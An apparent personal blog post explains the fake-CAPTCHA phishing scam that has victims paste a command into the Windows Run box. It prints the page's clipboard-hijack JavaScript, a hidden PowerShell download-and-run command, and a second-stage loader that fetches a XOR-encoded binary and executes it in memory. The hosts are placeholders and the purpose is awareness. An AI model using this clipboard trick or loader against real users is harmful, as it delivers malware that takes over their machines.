litomore.me

LitoMore's Mind

How Does the PowerShell Phishing Attack Work

Tags = [ CAPTCHA, PowerShell, Security, Windows ]

You might have heard of the new scam about the CAPTCHA which asks you to use Windows + R to verify that you are human. It gives you a popup and introduces a verification step with Windows + R and Ctrl + V then press Enter. You probably already know how it works, but let's take a closer look at their code this time.

Usually we see these scams from websites like GitHub, Reddit, etc. They are usually disguised as normal comments, such as the below:

Maybe this solution will solve your problem click this link: ...

They provide you with a link a and when you open it, you will find that the page requires a CAPTCHA verification. When you click this CAPTCHA button, a window will pop up on the page and ask you to use a set of key combinations to complete the verification. Like this:

Verification Steps:
1 - Press Windows + R
2 - Press Ctrl + V
3 - Press Enter

If you follow the steps they provide, you will fall into their trap.

What happened during this process?

Let's look directly at their code to see what is executed during the process.

First, let's use cURL to obtain the source code of the target URL. I'm using an example domain here in case you accidentally enter the trap.

curl https://example.com/captcha.html

Let's take a look at the key codes in the obtained content:

function open_modal() {
  var copyText =
    "powershell -WindowStyle Hidden ([ScriptBlock]::Create((irm https://example.com/scam))).Invoke()";
  var textarea = document.createElement("textarea");
  textarea.value = copyText;
  document.body.appendChild(textarea);
  textarea.select();
  document.execCommand("copy");
  document.body.removeChild(textarea);
  setTimeout(() => {
    document.querySelector("#modal").classList.remove("hidden");
  }, 2000);
}

It creates a phishing modal and uses execCommand("copy") to secretly copy a command to your clipboard. Browsers cannot automatically copy texts to the user's clipboard. This requires the user's interaction, so there is a CAPTCHA here. Let's see what the command does:

powershell -WindowStyle Hidden ([ScriptBlock]::Create((irm https://example.com/scam))).Invoke()

Now let's move to the https://example.com/scam to see its content:

curl https://example.com/scam

$url = "https://example.com/binary"
$webClient = New-Object System.Net.WebClient
$sell61 = $webClient.DownloadData($url)
$gossip123 = 0x09, 0x04, 0x05
$struggle6 = [byte[]]::new($sell61.Length)

for ($i = 0; $i -lt $sell61.Length; $i++) {
  $struggle6[$i] = $sell61[$i] -bxor $gossip123[$i % $gossip123.Length]
}

$afraid16 = [System.AppDomain]::CurrentDomain.Load($struggle6)

if ($afraid16.EntryPoint -ne $null) {
  $afraid16.EntryPoint.Invoke($null, @($null))
} else {
  Write-Host "glass glimpse glue gloom"
}

Then they can do whatever they want with your operating system through the implanted application.

Why is the phishing method so effective?

Effective phishing methods are often easy to operate and can catch you without realizing it. It calls misdirection. Just like CAPTCHA, the various verification methods now make people lose their vigilance, and some people lack basic computer knowledge and fall into this trap. Here is video The Art of Misdirection if you want to learn more about it.

On the other hand, due to the rise of smartphones and tablets, some people have become computer illiterate, especially the kids. As the Reddit post from r/Teachers mentioned, more and more students don't know how to use computers. People use their laptops only for schoolwork, and that's really about all you can do with it since the OS is so limited/sandboxed.

These factors combined make this phishing attack method such effective.

Other similar attacks

Some merchants on the Internet will sell Steam games at extremely low prices. They will give you a script and ask you to execute it. This script will install pirated games on your computer and take the opportunity to implant malicious scripts.